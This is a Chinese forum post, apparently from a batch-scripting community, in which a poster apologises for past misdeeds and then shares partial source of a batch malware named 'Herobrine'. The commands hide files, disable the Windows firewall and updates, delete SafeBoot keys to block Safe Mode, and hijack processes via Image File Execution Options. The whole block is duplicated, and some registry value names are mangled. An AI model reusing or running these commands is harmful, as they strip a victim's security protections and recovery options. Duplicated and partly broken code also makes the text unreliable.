我承认自己曾在批处理吧犯下的所以罪行
在此,我向各位吧主,小吧主及其批处理吧的全部成员表示深深的歉意
希望大家能给予我一个将功补过机会
我一定会好好把握住这个机会
努力为批处理吧做贡献
=================================================================================
以下为Herobrine的部分源代码
共批处理成员参考、学习
请勿用于非法用途
::无法显示隐藏文件
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\" /v AdvancedHiddendword /t REG_SZ /d 00000002 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\" /v Advanced\Folder\Hidden\SHOWALLCheckedValuedword /t REG_SZ /d 00000000 /f
::禁止启动Windows防火墙
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\" /v SharedAccessStartdword /t REG_SZ /d 00000004 /f
::禁止启动Windows自更新
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\" /v wuauservStartdword /t REG_SZ /d 00000004 /f
::使用户无法进入安全模式
reg add "HKEY_LOCAL_MACHINE\SYSTEM\Select" /v LastKnownGood /t REG_DWORD /d 00000001 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v ReportBootOk /t REG_SZ /d 0 /f
reg delete "HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\" /f
reg delete "HKEY_CURRENT_USER\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\" /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network" /f
::停止防火墙服务
net stop sharedaccess
::禁用防火墙服务
netsh firewall set opmode mode = disable
::在下面注册表中添加以进程名为名的注册表项来劫持进程
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\
debbuger=替换进程启动文件位置
在此,我向各位吧主,小吧主及其批处理吧的全部成员表示深深的歉意
希望大家能给予我一个将功补过机会
我一定会好好把握住这个机会
努力为批处理吧做贡献
=================================================================================
以下为Herobrine的部分源代码
共批处理成员参考、学习
请勿用于非法用途
::无法显示隐藏文件
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\" /v AdvancedHiddendword /t REG_SZ /d 00000002 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\" /v Advanced\Folder\Hidden\SHOWALLCheckedValuedword /t REG_SZ /d 00000000 /f
::禁止启动Windows防火墙
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\" /v SharedAccessStartdword /t REG_SZ /d 00000004 /f
::禁止启动Windows自更新
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\" /v wuauservStartdword /t REG_SZ /d 00000004 /f
::使用户无法进入安全模式
reg add "HKEY_LOCAL_MACHINE\SYSTEM\Select" /v LastKnownGood /t REG_DWORD /d 00000001 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v ReportBootOk /t REG_SZ /d 0 /f
reg delete "HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\" /f
reg delete "HKEY_CURRENT_USER\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\" /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network" /f
::停止防火墙服务
net stop sharedaccess
::禁用防火墙服务
netsh firewall set opmode mode = disable
::在下面注册表中添加以进程名为名的注册表项来劫持进程
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\
debbuger=替换进程启动文件位置
